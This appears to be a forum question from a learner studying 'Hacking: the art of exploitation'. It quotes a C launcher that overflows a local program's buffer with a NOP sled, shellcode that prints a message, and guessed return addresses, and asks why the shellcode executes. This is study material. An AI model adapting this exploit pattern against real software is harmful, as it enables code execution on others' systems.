I am recently reading Hacking: the art of exploitation. But I stuck in this piece of code.
const char shellcode[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x14\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x68\x61\x63\x6b\x69\x6e\x67\x20\x77\x6f\x72\x6c\x64\x0a";
int main(int argc, char **argv) {
unsigned int i, *ptr, ret, offset = 377;
char *command, *buffer;
command = (char *)malloc(200);
memset(command, 0, 200);
strcpy(command, "./overflow_shellcode \'");
buffer = command + strlen(command);
if (argc > 1)
offset = atoi(argv[1]);
ret = (unsigned int)&i - offset;
for (i = 0; i < 160; i += 4)
*((unsigned int *)(buffer + i)) = ret;
memset(buffer, 0x90, 60);
memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1);
strcat(command, "\'");
system(command);
free(command);
return 0;
}
I don't understand that shellcode is on the heap, ret is for over-writing the return address. But i is on stack, so rip will point to the return address, and won't point to the heap. Am I right? But my test tell me that, the shellcode is executed. But why?
